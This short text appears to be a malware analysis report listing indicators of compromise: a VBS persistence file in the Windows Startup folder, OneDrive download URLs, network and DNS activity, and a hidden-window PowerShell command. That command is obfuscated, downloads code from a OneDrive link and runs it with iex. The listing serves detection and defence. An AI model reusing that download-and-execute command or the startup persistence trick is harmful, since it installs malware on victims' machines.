Technical Information
- %APPDATA%\microsoft\windows\start menu\programs\startup\data.vbs
- https://onedrive.live.com/download?cid=9b6546adf0f7911a&resid=9b6546adf0f7911a%211260&authkey=aimlaxdpzdfxduk
- 'localhost':1177
- 'on####ve.live.com':443
- '8p####.#b.files.1drv.com':443
- DNS ASK on####ve.live.com
- DNS ASK 8p####.#b.files.1drv.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noexit [Byte[]]$sc64= iex(iex('(&(GCM *W-O*)Net.WebClient).DownloadString(''https://onedrive.live.com/download?cid=9B6546ADF0F7911A&resid=9B6546ADF0F7911A%211260&authkey=AImLaxDPZdFxdUk'')'));...' (with hidden window)